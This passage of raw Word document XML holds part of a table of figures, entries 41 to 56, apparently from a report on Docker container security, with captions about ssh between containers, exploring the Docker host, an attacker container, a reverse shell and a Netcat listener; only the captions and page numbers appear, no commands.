        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="495A9614" w14:textId="2C4F4121" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858632" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 41: ssh from con_ssh to con_nossh.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858632 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>57</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="333C60FF" w14:textId="0A5927CD" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858633" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 42: Alpine ssh to the con_nossh container.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858633 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>57</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2E61E769" w14:textId="1DCB7E00" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858634" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 43: identifying the systems.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858634 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>58</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7CF779A3" w14:textId="4F522521" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858635" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 44: launching Docker container mounted to the Docker daemon.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858635 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>58</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D0261E5" w14:textId="53A1DB12" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858636" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 45: identifying things on the host system.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858636 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>58</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F725573" w14:textId="2B883351" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858637" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 46: Docker images on the host.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858637 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>59</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0044ECA8" w14:textId="7F0279E6" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858638" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 47: Creating busybox container.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858638 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>59</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F378E45" w14:textId="4EC9393A" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858639" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 48: Exploring the Docker host directories.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858639 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>59</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4159D179" w14:textId="2D594723" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858640" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 49: Starting the container for the application.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858640 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>60</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2DC5E01B" w14:textId="6B3F0462" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858641" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 50: Accessing the application via the mapped port.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858641 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>60</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B333AC9" w14:textId="70D39A64" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858642" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 51: Attacker2 container.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858642 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>60</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1762F5BB" w14:textId="05F1FB82" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858643" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 52: All running containers.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858643 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>61</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A79D010" w14:textId="2F5F31EF" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858644" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 53: IP addresses of the running containers.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858644 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>61</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E2FDA71" w14:textId="04B42D91" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858645" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 54: Accessing the /etc/passwd directory on the web server.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858645 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>61</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CDBF8B7" w14:textId="488D6025" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858646" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 55: reverse shell commands.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858646 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>62</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2DE17240" w14:textId="7278EE83" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858647" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 56: Netcat listener on Attacker2 container.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858647 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
